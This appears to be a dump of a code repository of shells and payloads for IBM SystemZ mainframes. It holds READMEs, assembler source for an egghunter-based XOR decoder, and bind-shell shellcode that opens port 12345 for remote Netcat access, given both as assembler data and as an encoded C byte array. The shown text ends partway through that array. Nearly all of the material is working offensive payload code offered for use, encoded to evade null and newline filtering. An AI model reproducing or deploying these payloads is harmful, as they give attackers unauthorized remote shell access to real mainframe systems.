├── README.md ├── bind-shell ├── README.md ├── sb_shellcode.s ├── sb_shellcode.s.asc ├── sb_shellcode.txt ├── sb_shellcode.txt.asc ├── shell_bind.s └── shell_bind.s.asc ├── local-exec-shell └── local_shell.s ├── operexp ├── Makefile └── src │ └── racr.s └── reverse-shell ├── reverse-shell-noenc.s ├── reverse-shell-noenc.s.asc └── sr_shellcode.txt /README.md: -------------------------------------------------------------------------------- 1 | # shells-payloads 2 | Source code for SystemZ Shells / Payloads 3 | 4 | **local-exec-shell** - Code used to launch local shell via exec USS callable service. 5 | 6 | **bind-shell** - Code used to launch bind shell which can be connected to remotely (Via windows, linux, etc by Netcat, for instance) to gain local shell. 7 | -------------------------------------------------------------------------------- /bind-shell/README.md: -------------------------------------------------------------------------------- 1 | ###shell_bind.s - 2 | *Will open bind socket on port 12345, address 0.0.0.0 on SystemZ.* 3 | ###sb_shellcode.txt - 4 | *Slimmed down shellcode version of the above that is XOR encoded to remove nulls and EBCDIC newlines. Built in decoder bytes in the beginning will decode the payload and jump to it.* 5 | ###sb_shellcode.s - 6 | *Source code for above shellcode. Code uses an egghunter to find the beginning of the encoded data. Uses XOR encoding to decode the payload then jumps to and executes it. Built in EBCDIC to ASCII conversion allows for connections from Windows or 'Nix systems. 7 | -------------------------------------------------------------------------------- /bind-shell/sb_shellcode.s: -------------------------------------------------------------------------------- 1 | TITLE 'sb_shellcode.s x 2 | Author: Bigendian Smalls' 3 | ACONTROL AFPR 4 | SBSHELL CSECT 5 | SBSHELL AMODE 31 6 | SBSHELL RMODE ANY 7 | SYSSTATE ARCHLVL=2 8 | ENTRY MAIN 9 | MAIN DS 0F 10 | ** Begin setup and stack management ** 11 | STM 6,4,12(13) # store all the registers in old SP area 12 | LARL 15,*-4 # put base addr into R15 13 | LR 12,15 # put given base addr into R12 14 | XR 1,1 # zeroout R1 for counting 15 | XR 2,2 # zeroout R1 for counting 16 | XR 3,3 # zeroout R3 17 | AFI 1,X'01010102' # loading a 1 in R1 18 | AFI 2,X'01010103' # loading a 1 in R1 19 | XR 1,2 # loading a 1 in R1 20 | LR 4,1 # will put a 4 in R4 21 | SLA 4,1(1) # make R1 == 4 22 | XR 10,10 # zeroout R10 for our egg 23 | XR 2,2 # zero 2 24 | LGFI 10,X'deadbeef' # load egghunter value into R10 25 | LR 11,12 # load base int R11 26 | LOOPER AR 11,1 # add 1 to R11 27 | L 3,1(2,11) # retrieve value at R11 +1 indexR2=0 28 | CR 10,3 # compare egg with R11 mem pointer 29 | BRC 7,LOOPER # branch anything but equal 30 | AR 11,4 31 | L 3,1(2,11) # retrieve value at R11 +1 indexR2=0 32 | CR 10,3 # compare egg with R11 mem pointer 33 | BRC 7,LOOPER # 2nd check 2 in a row good to go! 34 | AR 11,1 # 1 for the offset from above 35 | SR 11,4 # 4 to skip last egg 36 | ST 13,4(,11) # store old SP for later in wkg area 37 | ST 11,8(,13) # store this in old wking area 38 | LR 13,11 # set up R13 pt to new wkg area 39 | ** End setup and stack management ** 40 | ** Begin main decoding routine ** 41 | LR 3,11 # This is now our egghunter loc 42 | AR 3,4 # add 4 to 3 43 | AR 3,4 # R3 points to SC for decoding 44 | LR 5,3 # R5 points to SC for jumping to 45 | SR 3,1 # R3-1 to we can XI that addr w/o nulls 46 | SR 3,1 # R3-1 to we can XI that addr w/o nulls 47 | LR 4,1 # R4 has static 1 48 | XR 1,1 # R1 will be our byte counter 49 | XR 2,2 # R2 will be address pointer 50 | LOOP1 AR 1,4 # add 1 to R1 byte counter 51 | ARK 2,3,1 # generate new address pointer 52 | * put the XOR key (enc buffer char) from below in the quotes below 53 | XI 1(2),X'2a' # xor byte with key 54 | * put the buffer len (num of bytes) in the next cmd in CHI 1, 55 | CHI 1,1664 # to yield sc len 56 | BRC 4,LOOP1 # loop bwd 18 bytes if R1 < size 57 | XR 4,4 58 | ** Begin cleanup and stack management ** 59 | L 13,4(4,11) # reload old SP 60 | LM 6,4,12(13) # restore registers 61 | BCR 15,5 # jmp to sc 62 | ** End main decoding routine ** 63 | DC X'DEADBEEF' #egg 64 | DC X'DEADBEEF' #egg + old sp 65 | ******************************************************************* 66 | *Buffer length: 3328 67 | *Number of bytes: 1664 68 | *Padding bytes: 0 69 | *Enc buffer char: 0x2a 70 | *ASM buffer: 71 | DC X'bac6fa26eadad5d5d5d43225ea6a2a2a28fc7afa6a2e32fe8db22aX 72 | 2b8de22a2e8dde2a6cea1a2a2a2a22fd191a2a1a2a3d192dd42a2a2aX 73 | 2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2aX 74 | 2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2aea3ad5d5d5cceeX 75 | c52a2a288fc6122a3d2a54311331738d' 76 | DC X'162a2e8d762a2e301b307bc61f2a22aa5c7a1a1a2a30168dded5d0X 77 | 8f70aa2a7a7a7a2a2fc5eec72a2a28a02dd4eed72a2a28be8dcfd593X 78 | ea5a2a2a28a3ee55d5d5d596ea5a2a2a28abee55d5d5d592ea5a2a2aX 79 | 2853ee55d5d5d59eea5a2a2a285fee55d5d5d59aea5a2a2a28adee55X 80 | d5d5d5868d122a2c8d722a228dcfd59d' 81 | DC X'eed72a2a28478dcfd5baea5a2a2a285cee55d5d5d5b9ea5a2a2a28X 82 | 58ee55d5d5d5a5ea5a2a2a2886ee55d5d5d5a18d122a2e8d722a2c8dX 83 | cfd5b032d6ee47d5d5d5a9c64d28062a54eed72a2a2861ea5a2a2a28X 84 | 7eee55d5d5d55bea5a2a2a281cee55d5d5d5478d122a298d722a2f8dX 85 | cfd554eed72a2a28128dcfd57dea5a2a' 86 | DC X'2a2817ee55d5d5d570ea5a2a2a2869ee55d5d5d57cea5a2a2a281fX 87 | ee55d5d5d578ea5a2a2a2813ee55d5d5d5648d122a2f8d722a2c8dcfX 88 | d5718dcf2b5cee752a2a287dee452a2a287c8dcf2b44ee752a2a2879X 89 | ee452a2a2878eed72a2a2bd18dcfd50e8d122a2b8d722a298dcfd56aX 90 | ee07d5d5d50ec60d2a522a546b0a2a23' 91 | DC X'ee772a2a2816324f8dcf2b0eee772a2a281a324f8dcf2b346b0a2aX 92 | 22ee772a2a2806ea4b2a2a2a2a8dcf2b3eee772a2a2808ea4b2a2a2aX 93 | 2b8dcf2b26ee772a2a2830ea4b2a2a2a288dcf2b2e6b0a2a23ee772aX 94 | 2a2838324f8dcf2ad6ee772a2a2820324f8dcf2adceed72a2a2b9c8dX 95 | cfd4f7ea5a2a2a2bf9ee55d5d5d4ca30' 96 | DC X'56ee55d5d5d4f4ea5a2a2a2be5ee55d5d5d4f03056ee552a2a2be6X 97 | 3056ee55d5d5d4fe3056ee552a2a2be23056ee55d5d5d4e4ea5a2a2aX 98 | 2ba3ee55d5d5d4e0ee55d5d5d4e3ee55d5d5d4e2ee55d5d5d4edee55X 99 | d5d5d4ec8d122a218d722a278dcfd4ed8d2f2b766b0a2a23ee772a2aX 100 | 2bef324f8dcf2a85ee772a2a2b97324f' 101 | DC X'8dcf2a836b0a2a2eee772a2a2bad8d422a2d8dcf2a8aee772a2a2bX 102 | 868d422a2c8dcf2ab3ea7a2a2a2b53eaaa2a2a2a268dcf2a318dcf2aX 103 | caea7a2a2a2b8b8dcf2a70ea7a2a2a2bbceaaad5d5d5c48dcf2a268dX 104 | cf2ad4eacad5d5d5dcea7a2a2a2b778dde2a62eed72a2a2b6832948dX 105 | cfd474ea0a2a2a2b58fd290a2a0a2aea' 106 | DC X'0a2a2a2b4efd250a2a0a2aee75d5d5d472ea5a2a2a2b71ee552a2aX 107 | 2b7eea5a2a2a2b7bee55d5d5d464ea5a2a2a2b25ee55d5d5d460ea5aX 108 | 2a2a2b6dee55d5d5d46cea5a2a2a2b61ee55d5d5d4688d122a2c8d72X 109 | 2a2d8dcfd46732c132d3ee472a2a2b17c648ca2a2ad4c642aa2ad5d4X 110 | 8d2f2af2eed72a2a2ad432948dcfd432' 111 | DC X'ee75d5d5d434ea5a2a2a2b0bee552a2a2b30ea5a2a2a2b3dee55d5X 112 | d5d43eea5a2a2a2affee55d5d5d43aea5a2a2a2b3dee55d5d5d4268dX 113 | 122a2f8d722a2d8dcfd43332c1ee47d5d5d42e32dcc6422a80d5542dX 114 | d4eed72a2a2afa32948dcfd7c2ee752a2a2ad4ee052a2a2ad7ee452aX 115 | 2a2ad6ea5a2a2a2adfee55d5d5d7c830' 116 | DC X'56ee55d5d5d7ca3056ee55d5d5d7f48d122a2e8d722a2c8dcfd7c7X 117 | 32c1ee57d5d5d7fcc6522a55d5542dd4eed72a2a2a8d32948dcfd797X 118 | ea5a2a2a2af3ee55d5d5d7ea3056ee55d5d5d7948d122a298d722a2fX 119 | 8dcfd7e5ee47d5d5d79d8dd22a49c6422a4ad554ee772a2a2aebee47X 120 | 2a2a2aea32c12dd4ea3a2a2a2a83ee67' 121 | DC X'2a2a2a848da22a3fea0a2a2a2aeb3d4cc91a3a2a2a5cea112a2a2aX 122 | d533128d5e2a228d722aaf687a3a2a8dde2a25c97a0a2a2a5cea712aX 123 | 2a2ad530433003331f8d5ed5dd684a3a2a303331638d5ed5f42dd4eeX 124 | 672a2a2aaeea3a2a2a2a538da22aafea0a2a2a2abe3103c91a3a2a2aX 125 | 5cea112a2a2ad533128d5e2a2c8d122a' 126 | DC X'4f8dde2a233009c91a0a2a2a5cea112a2a2ad5681a3a2a30333163X 127 | 8d5ed5ce2dd43dd5ea6a2a2a2a3a7ada6a2a72fa6a2eb2c6fa26ea6aX 128 | 2a2a2a2d72da6a2a2dd42a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2bX 129 | 2a2a2a282b7919962b79198e2b791d3a2b791c1c2b791c422b791c0eX 130 | 2b7919342b7919a02b7918662b79192c' 131 | DC X'2a2a2a2a2a2a2a3a2a2a2a2a2a2a2a2a3a282a2a2a2a2a2a2a2a2aX 132 | 2a2a2a2a2a2a2a2a2d4ba8a3bf4b88a22a2a2a2a2b2a2a2a282a2a2aX 133 | 2a88a22a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a3a08080808080808X 134 | 0808080808080808082a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2aX 135 | 2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a' 136 | DC X'2a2a2a2a2a28281a132a2a2a2a' 137 | E2ABU DC X'0102039c09867f978d8e0b0c0d0e0f101112139d0a08871819928fX 138 | 1c1d1e1f808182838485171b88898a8b8c0506079091169394959604X 139 | 98999a9b14FF9e1a20a0e2e4e0e1e3e5e7f1a22e3c282b7c26e9eaebX 140 | e8edeeefecdf21242a293b5e2d2fc2c4c0c1c3c5c7d1a62c255f3e3fX 141 | f8c9cacbc8cdcecfcc603a2340273d22' 142 | DC X'd8616263646566676869abbbf0fdfeb1b06a6b6c6d6e6f707172aaX 143 | bae6b8c6a4b57e737475767778797aa1bfd05bdeaeaca3a5b7a9a7b6X 144 | bcbdbedda8af5db4d77b414243444546474849adf4f6f2f3f57d4a4bX 145 | 4c4d4e4f505152b9fbfcf9faff5cf7535455565758595ab2d4d6d2d3X 146 | d530313233343536373839b3dbdcd9da' 147 | DC X'9f' 148 | ****************************************************************** 149 | DC X'8BADF00D' eof marker 150 | END 151 | -------------------------------------------------------------------------------- /bind-shell/sb_shellcode.s.asc: -------------------------------------------------------------------------------- 1 | -----BEGIN PGP MESSAGE----- 2 | Comment: GPGTools - https://gpgtools.org 3 | 4 | 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 58 | NEQ01iiORJjEMJhEFimkkUEWJRhhwDamsUHgcQQ3I0AIicrlDgBisIWDjSIcuRGd 59 | RRyHGKIfxZGEQUojjgQKYxRjLGIasxhu/6jcmOMojmMZK8x27owtlgQUwwjrxlsM 60 | Yy23YQKL0Nd0ilgNpwPu2rYMaxu5adcmVpuEYOLORkwVHHLo/JpophFgmmquQ4Nh 61 | ENOEcyj5tOxaEulYS610pGGG0665IMAlZYiEFAr6kAwYuG4LIqhgggshQgE3WamU 62 | SlACPVFhhYQUSmgB3VIkIQoxFLZy7pWE61CkBVyTeGhDGrKQhyKE6RFal5RYJQZx 63 | BVdrN2VSyVUoYxmq8pVDaWWUNQbORMKNYiYMFcOMwCTDGFwkYb6MWAz9miUiIQlN 64 | oJMy0FoSxDRzV5KEI445TPWJSnQSJzDEcJ2EnHLGORc85BGPuVRwDo0wMKMN6y2I 65 | AjChSjLKqaAh3Opi6E7KaBObYbCO4frwDvzJsyQ3mqxM70Ro2v2N1TaToC5bK/7/ 66 | AMzsnR65dfMnzty0eWTTWVvetf/4jqc3jbz7AwePvXLXRec0LvxqdPabl9yy/tr1 67 | J56bWycvH/5156VNZ72449iJ2+Ir7/7PH+594bznPr/r1ZXrxpo3n9F46MF/vPrI 68 | lmNX6eiTS1vufLS2svb7nx659UNP/ORhfic/97sn2o8ev//cH9x85vOvjc3+bOGb 69 | Lz/95zuqT7707FeuOPT6v7Y//Pj5V//loeufPXjz7ZVrTrxx9+SJFz7+xq8e3/+j 70 | +3nj3//9+/kXfPgCJJ55/NrPvbSldsu9bxy55O7z4n0f3bv9keT2qP7aR17/xVN3 71 | fepLv1m54543r10/dsn2e77+x/vWv3POlxtbHnjkrz+35ux/HvreL817v/HDM2+/ 72 | 7cHx95z1t3sfezR67k9bf4e/f8Mzc9967NgFD3xt5DPP//bFV77wRO3JtfvkB49f 73 | fP2FV138sS8+9T8= 74 | =bIR5 75 | -----END PGP MESSAGE----- 76 | -------------------------------------------------------------------------------- /bind-shell/sb_shellcode.txt: -------------------------------------------------------------------------------- 1 | char sc[]= 2 | "\x90\x64\xd0\x0c\xc0\xf0\xff\xff\xff\xfe\x18\xcf\x17\x11\x17\x22" 3 | "\x17\x33\xc2\x19\x01\x01\x01\x02\xc2\x29\x01\x01\x01\x03\x17\x12" 4 | "\x18\x41\x8b\x40\x10\x01\x17\xaa\x17\x22\xc0\xa1\xde\xad\xbe\xef" 5 | "\x18\xbc\x1a\xb1\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xfc\x1a\xb4" 6 | "\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xf6\x1a\xb1\x1b\xb4\x50\xd0" 7 | "\xb0\x04\x50\xb0\xd0\x08\x18\xdb\x18\x3b\x1a\x34\x1a\x34\x18\x53" 8 | "\x1b\x31\x1b\x31\x18\x41\x17\x11\x17\x22\x1a\x14\xb9\xf8\x10\x23" 9 | "\x97\x2a\x20\x01\xa7\x1e\x06\x80\xa7\x44\xff\xf9\x17\x44\x58\xd4" 10 | "\xb0\x04\x98\x64\xd0\x0c\x07\xf5\xde\xad\xbe\xef\xde\xad\xbe\xef" 11 | "\xba\xc6\xfa\x26\xea\xda\xd5\xd5\xd5\xd4\x32\x25\xea\x6a\x2a\x2a" 12 | "\x28\xfc\x7a\xfa\x6a\x2e\x32\xfe\x8d\xb2\x2a\x2b\x8d\xe2\x2a\x2e" 13 | "\x8d\xde\x2a\x6c\xea\x1a\x2a\x2a\x2a\x22\xfd\x19\x1a\x2a\x1a\x2a" 14 | "\x3d\x19\x2d\xd4\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a" 15 | "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a" 16 | "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a" 17 | "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\xea\x3a\xd5\xd5\xd5\xcc\xee\xc5" 18 | "\x2a\x2a\x28\x8f\xc6\x12\x2a\x3d\x2a\x54\x31\x13\x31\x73\x8d\x16" 19 | "\x2a\x2e\x8d\x76\x2a\x2e\x30\x1b\x30\x7b\xc6\x1f\x2a\x22\xaa\x5c" 20 | "\x7a\x1a\x1a\x2a\x30\x16\x8d\xde\xd5\xd0\x8f\x70\xaa\x2a\x7a\x7a" 21 | "\x7a\x2a\x2f\xc5\xee\xc7\x2a\x2a\x28\xa0\x2d\xd4\xee\xd7\x2a\x2a" 22 | "\x28\xbe\x8d\xcf\xd5\x93\xea\x5a\x2a\x2a\x28\xa3\xee\x55\xd5\xd5" 23 | "\xd5\x96\xea\x5a\x2a\x2a\x28\xab\xee\x55\xd5\xd5\xd5\x92\xea\x5a" 24 | "\x2a\x2a\x28\x53\xee\x55\xd5\xd5\xd5\x9e\xea\x5a\x2a\x2a\x28\x5f" 25 | "\xee\x55\xd5\xd5\xd5\x9a\xea\x5a\x2a\x2a\x28\xad\xee\x55\xd5\xd5" 26 | "\xd5\x86\x8d\x12\x2a\x2c\x8d\x72\x2a\x22\x8d\xcf\xd5\x9d\xee\xd7" 27 | "\x2a\x2a\x28\x47\x8d\xcf\xd5\xba\xea\x5a\x2a\x2a\x28\x5c\xee\x55" 28 | "\xd5\xd5\xd5\xb9\xea\x5a\x2a\x2a\x28\x58\xee\x55\xd5\xd5\xd5\xa5" 29 | "\xea\x5a\x2a\x2a\x28\x86\xee\x55\xd5\xd5\xd5\xa1\x8d\x12\x2a\x2e" 30 | "\x8d\x72\x2a\x2c\x8d\xcf\xd5\xb0\x32\xd6\xee\x47\xd5\xd5\xd5\xa9" 31 | "\xc6\x4d\x28\x06\x2a\x54\xee\xd7\x2a\x2a\x28\x61\xea\x5a\x2a\x2a" 32 | "\x28\x7e\xee\x55\xd5\xd5\xd5\x5b\xea\x5a\x2a\x2a\x28\x1c\xee\x55" 33 | "\xd5\xd5\xd5\x47\x8d\x12\x2a\x29\x8d\x72\x2a\x2f\x8d\xcf\xd5\x54" 34 | "\xee\xd7\x2a\x2a\x28\x12\x8d\xcf\xd5\x7d\xea\x5a\x2a\x2a\x28\x17" 35 | "\xee\x55\xd5\xd5\xd5\x70\xea\x5a\x2a\x2a\x28\x69\xee\x55\xd5\xd5" 36 | "\xd5\x7c\xea\x5a\x2a\x2a\x28\x1f\xee\x55\xd5\xd5\xd5\x78\xea\x5a" 37 | "\x2a\x2a\x28\x13\xee\x55\xd5\xd5\xd5\x64\x8d\x12\x2a\x2f\x8d\x72" 38 | "\x2a\x2c\x8d\xcf\xd5\x71\x8d\xcf\x2b\x5c\xee\x75\x2a\x2a\x28\x7d" 39 | "\xee\x45\x2a\x2a\x28\x7c\x8d\xcf\x2b\x44\xee\x75\x2a\x2a\x28\x79" 40 | "\xee\x45\x2a\x2a\x28\x78\xee\xd7\x2a\x2a\x2b\xd1\x8d\xcf\xd5\x0e" 41 | "\x8d\x12\x2a\x2b\x8d\x72\x2a\x29\x8d\xcf\xd5\x6a\xee\x07\xd5\xd5" 42 | "\xd5\x0e\xc6\x0d\x2a\x52\x2a\x54\x6b\x0a\x2a\x23\xee\x77\x2a\x2a" 43 | "\x28\x16\x32\x4f\x8d\xcf\x2b\x0e\xee\x77\x2a\x2a\x28\x1a\x32\x4f" 44 | "\x8d\xcf\x2b\x34\x6b\x0a\x2a\x22\xee\x77\x2a\x2a\x28\x06\xea\x4b" 45 | "\x2a\x2a\x2a\x2a\x8d\xcf\x2b\x3e\xee\x77\x2a\x2a\x28\x08\xea\x4b" 46 | "\x2a\x2a\x2a\x2b\x8d\xcf\x2b\x26\xee\x77\x2a\x2a\x28\x30\xea\x4b" 47 | "\x2a\x2a\x2a\x28\x8d\xcf\x2b\x2e\x6b\x0a\x2a\x23\xee\x77\x2a\x2a" 48 | "\x28\x38\x32\x4f\x8d\xcf\x2a\xd6\xee\x77\x2a\x2a\x28\x20\x32\x4f" 49 | "\x8d\xcf\x2a\xdc\xee\xd7\x2a\x2a\x2b\x9c\x8d\xcf\xd4\xf7\xea\x5a" 50 | "\x2a\x2a\x2b\xf9\xee\x55\xd5\xd5\xd4\xca\x30\x56\xee\x55\xd5\xd5" 51 | "\xd4\xf4\xea\x5a\x2a\x2a\x2b\xe5\xee\x55\xd5\xd5\xd4\xf0\x30\x56" 52 | "\xee\x55\x2a\x2a\x2b\xe6\x30\x56\xee\x55\xd5\xd5\xd4\xfe\x30\x56" 53 | "\xee\x55\x2a\x2a\x2b\xe2\x30\x56\xee\x55\xd5\xd5\xd4\xe4\xea\x5a" 54 | "\x2a\x2a\x2b\xa3\xee\x55\xd5\xd5\xd4\xe0\xee\x55\xd5\xd5\xd4\xe3" 55 | "\xee\x55\xd5\xd5\xd4\xe2\xee\x55\xd5\xd5\xd4\xed\xee\x55\xd5\xd5" 56 | "\xd4\xec\x8d\x12\x2a\x21\x8d\x72\x2a\x27\x8d\xcf\xd4\xed\x8d\x2f" 57 | "\x2b\x76\x6b\x0a\x2a\x23\xee\x77\x2a\x2a\x2b\xef\x32\x4f\x8d\xcf" 58 | "\x2a\x85\xee\x77\x2a\x2a\x2b\x97\x32\x4f\x8d\xcf\x2a\x83\x6b\x0a" 59 | "\x2a\x2e\xee\x77\x2a\x2a\x2b\xad\x8d\x42\x2a\x2d\x8d\xcf\x2a\x8a" 60 | "\xee\x77\x2a\x2a\x2b\x86\x8d\x42\x2a\x2c\x8d\xcf\x2a\xb3\xea\x7a" 61 | "\x2a\x2a\x2b\x53\xea\xaa\x2a\x2a\x2a\x26\x8d\xcf\x2a\x31\x8d\xcf" 62 | "\x2a\xca\xea\x7a\x2a\x2a\x2b\x8b\x8d\xcf\x2a\x70\xea\x7a\x2a\x2a" 63 | "\x2b\xbc\xea\xaa\xd5\xd5\xd5\xc4\x8d\xcf\x2a\x26\x8d\xcf\x2a\xd4" 64 | "\xea\xca\xd5\xd5\xd5\xdc\xea\x7a\x2a\x2a\x2b\x77\x8d\xde\x2a\x62" 65 | "\xee\xd7\x2a\x2a\x2b\x68\x32\x94\x8d\xcf\xd4\x74\xea\x0a\x2a\x2a" 66 | "\x2b\x58\xfd\x29\x0a\x2a\x0a\x2a\xea\x0a\x2a\x2a\x2b\x4e\xfd\x25" 67 | "\x0a\x2a\x0a\x2a\xee\x75\xd5\xd5\xd4\x72\xea\x5a\x2a\x2a\x2b\x71" 68 | "\xee\x55\x2a\x2a\x2b\x7e\xea\x5a\x2a\x2a\x2b\x7b\xee\x55\xd5\xd5" 69 | "\xd4\x64\xea\x5a\x2a\x2a\x2b\x25\xee\x55\xd5\xd5\xd4\x60\xea\x5a" 70 | "\x2a\x2a\x2b\x6d\xee\x55\xd5\xd5\xd4\x6c\xea\x5a\x2a\x2a\x2b\x61" 71 | "\xee\x55\xd5\xd5\xd4\x68\x8d\x12\x2a\x2c\x8d\x72\x2a\x2d\x8d\xcf" 72 | "\xd4\x67\x32\xc1\x32\xd3\xee\x47\x2a\x2a\x2b\x17\xc6\x48\xca\x2a" 73 | "\x2a\xd4\xc6\x42\xaa\x2a\xd5\xd4\x8d\x2f\x2a\xf2\xee\xd7\x2a\x2a" 74 | 